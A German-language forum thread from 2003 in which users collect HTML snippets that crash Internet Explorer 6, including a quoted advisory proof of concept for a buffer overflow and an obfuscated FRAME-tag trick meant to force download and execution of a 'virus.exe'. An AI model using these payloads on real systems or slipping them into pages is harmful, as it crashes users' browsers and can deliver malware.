HTML Code bringt Internet Explorer 6 zum Absturz

#0
03.05.2003, 12:56
Administrator
Avatar Lukas

Beiträge: 1743
#1 Hi,

tja was lese ich hier gerade wieder bei Heise:
HTML-Code bringt Internet Explorer zum Absturz

folgender Code bringt den aktuellen Microsoft Internet Explorer 6 SP1/2 zum abstürzen:

Zitat

<html>
<form>
<input type crash>
</form>
</html>


okay wo die schon dabei sind, dachte ich mir erweiter ich die Code Palette mal -> folgender Code bringt den Internet Explorer ebenfalls zum Absturz:

Zitat

<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT>
</object>


und folgender Code ebenfalls (ist in der neusten IE Version gefixt ;) ):

Zitat

<style>p{csstext: font-weight: bold;}</style>


und wer davon nicht genug hat, kann es ja mal mit:
http://www.raus.de [Vorsicht! - erst alles abspeichern]
versuchen - zieht Dank Popups ganz gerne mal das ganze System runter (nicht nur beim IE) ;)

Bugs findet man beim IE eigentlich nicht genug, aber ob Opera und Co da wirklich besser sind?

klar um so weniger das Programm bekannt ist um so weniger Leute suchen und finden Bugs... - und bei Microsoft suchen und finden ziemlich viele!

vieleicht könnt ihr die BAD HTML Code Liste ja noch ergänzen ;)
__________
Gruß Lukas :yo
Seitenanfang Seitenende
03.05.2003, 13:46
Member

Beiträge: 3306
#2 Also das erste funktioniert mit jedem Input Type, aber nur wenn es auf einer extra Seite vorkommt. Der Bug ist eigentlich schon seit langem bekannt.

Das zweite funktioniert bei mir auch innerhalb einer bereits vorhandenen Seite.
Er lädt zwar erst ein bißchen schmiert dann aber letztendlich doch noch erfolgreich ab ;)

Das dritte konnte ich bei mir irgendwie nicht nachvollziehen. Vielleicht haben sie es inzwischen gefixt.

Übrigens funktionieren diese Bugs natürlich auch mit Outlook Express, Frontpage und Co.
__________
Bitte keine Anfragen per PM, diese werden nicht beantwortet.
Seitenanfang Seitenende
03.05.2003, 15:46
Member

Beiträge: 76
#3 Der Code ist genial, weil er so genial einfach ist. Hehe!
__________
Wer weiß, dass er nichts weiß, weiß mehr als der, der nicht weiß, dass er nichts weiß.
Seitenanfang Seitenende
06.05.2003, 21:37
Member

Beiträge: 44
#4 Hi,

natürlich ist der Bug nicht exklusiv dem IE6 vorbehalten, wie es vielleicht das Topic
vermuten läßt, sondern betrifft auch alle Vorgängerversionen.

"Erfolgreich" getestet habe ich (IE5.5 mit SP2 und zahlreichen Hotfixes etc.):

1. Input-Type-Bug
2. Object-Bug
--> Bei deaktivierter ActiveX-Unterstützung passiert nix (aber leider mit)!
3. Style-Bug

Auffallend ist, daß alle 3 Bugs in unterschiedlichen DLLs lokalisiert sind:
Input-Bug in shlwapi.dll, Object-Bug in shdocvm.dll und der Style-Bug in mshatml.dll.

MfG
ToRRis
Seitenanfang Seitenende
07.05.2003, 08:07
Member

Beiträge: 3306
#5 Und wenn du das ganze so schreibst:

Code

<object id="test"
     data="#"
     width="100%" height="100%"
     type="text/x-scriptlet">
     VIEWASTEXT
</object>
Ist es auch noch vollständig W3C-Kompatibel ;)
__________
Bitte keine Anfragen per PM, diese werden nicht beantwortet.
Dieser Beitrag wurde am 07.05.2003 um 08:07 Uhr von asdrubael editiert.
Seitenanfang Seitenende
14.05.2003, 01:17
Member

Beiträge: 23
#6 hm gibts nen thread mit den BAD HTML Code's ? wenn ja zeigt mal bitte her find das nicht, hab scho gesucht
__________
da sitzt bestimmt immer n typ, der dann auf "disconnect" drückt, wenn 24 h vorbei sind ;)
Seitenanfang Seitenende
14.05.2003, 20:23
Member

Beiträge: 44
#7 Blind? ;)
Die HTML-Codes stehen doch weiter oben in diesem Thread...
Dieser Beitrag wurde am 14.05.2003 um 20:24 Uhr von ToRRis editiert.
Seitenanfang Seitenende
16.05.2003, 18:05
...neu hier

Beiträge: 7
#8

Zitat


und wer davon nicht genug hat, kann es ja mal mit:
http://www.raus.de [Vorsicht! - erst alles abspeichern]


Hm also ich bin immer wieder von Phoenix begeistert ;) Ich bekomme nur ne Seite mit Smiles? und passieren tut nichts *gott sei dank*

Hengt sich eigentlich das ganze System auf? oder was machen diese Bugs? Nur bewirken das der IE sich aufhengt?

sers TeleTobi
Seitenanfang Seitenende
26.05.2003, 20:48
Member

Beiträge: 44
#9 Für den 6er IE gibt's jetzt wieder 'ne neue Lücke, diesmal per FRAME-Tag.

Man kreiere eine lange Liste mit Frames (ca. 200) ala:

Code


<FR/\ME src="C:\winnt\notepad.exe"></FR/\ME>
...
<FRA/\ME src="h++p://mywebsite.de/virus.exe"></FR/\ME>
...

(Anmerkung: Die /\ sind durch A zu ersetzen und die + durch t)

Dadurch soll der automatische Download und das Ausführen von virus.exe erzwungen werden.

Testseite: h++p://www.malware.com/forceframe.html (VORSICHT!!!)

Quelle: http://www.securiteam.com

MfG
ToRRis
Dieser Beitrag wurde am 26.05.2003 um 20:49 Uhr von ToRRis editiert.
Seitenanfang Seitenende
10.06.2003, 19:03
...neu hier

Beiträge: 7
#10 Browser-Verweis auf "c:\" soll auch gut wirken ;-)
Zumindest auf 98er Rechnern meines wissens.
Seitenanfang Seitenende
11.06.2003, 10:35
Member

Beiträge: 3306
#11

Code

ftp*://????????????????

Bringt meinen IE auch zum Absturz.
__________
Bitte keine Anfragen per PM, diese werden nicht beantwortet.
Seitenanfang Seitenende
01.07.2003, 18:45
Administrator
Themenstarter
Avatar Lukas

Beiträge: 1743
#12 Hab schon wieder was:

http://www.tecchannel.de/sicherheit/reports/363.html

Zitat

Beschreibung

Eine Sicherheitslücke in Microsoft Internet Explorer ermöglicht externen Angreifern, das System zu kompromittieren.

Die Schwäche beruht auf einem Begrenzungsfehler, über den sich mittels eines HTML-Dokuments mit speziellem Skript-Code ein Pufferüberlauf provozieren lässt.

Ein erfolgreicher Angriff bringt entweder den Browser zum Absturz oder ermöglicht die Ausführung beliebigen Codes im Sicherheitskontext des Benutzers. Dazu muss der Angreifer den Benutzer dazu bringen, ein entsprechend präpariertes HTML-Dokument zu betrachten.

Das folgende Beispiel stammt aus dem Original-Advisory. Es öffnet ein neues Fenster und fügt dann eine horizontale Linie ein, wobei das Tag <HR> ein überlanges Argument für das Attribut "align" verwendet. Der Inhalt wird anschließend kopiert und das Fenster geschlossen, was den Pufferüberlauf anstößt.

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>



Lösung

Schalten Sie das Active Scripting aus.


...echt ein produktives Thread ;) ;) ;)
__________
Gruß Lukas :yo
Seitenanfang Seitenende
01.09.2003, 14:38
Administrator
Themenstarter
Avatar Lukas

Beiträge: 1743
#13 okay IE 6 mit allen Sicherheitspatches bis August:

Textpopups sind immer möglich: http://www.computerbytesman.com/security/notepadpopups.htm ;)
__________
Gruß Lukas :yo
Seitenanfang Seitenende
22.09.2003, 20:53
Member

Beiträge: 1516
#14 <img src=neu.jpg width="9000000" height="9000000">
Hab mit den Code schon folgendes geschaft:
1.1-2 Minuten Systemauslastung/stillstand
2. I.E abgeschossen
3. Bluescreen auf Xp weil der Ati Treiber versagt hat

Wie sieht es bei euch aus?
Ist es bei nividia genau das selbe Problem?

Mozilla besteht den Test ;)
__________
°<- Vorsicht Trollköder und Trollfalle -> {_}
Seitenanfang Seitenende
22.09.2003, 21:40
Moderator
Avatar joschi

Beiträge: 6466
#15

Zitat

<img src=neu.jpg width="9000000" height="9000000">
Wie sieht es bei euch aus?
Ein IE6, SP1 Q822925 auf nem 66Mhz-Rechner, Win98SE, 64MB RAM, 4MB Grafik, keine Probleme.
Langer Scrollbalken, aber prompt angezeigt
__________
Durchsuchen --> Aussuchen --> Untersuchen
Seitenanfang Seitenende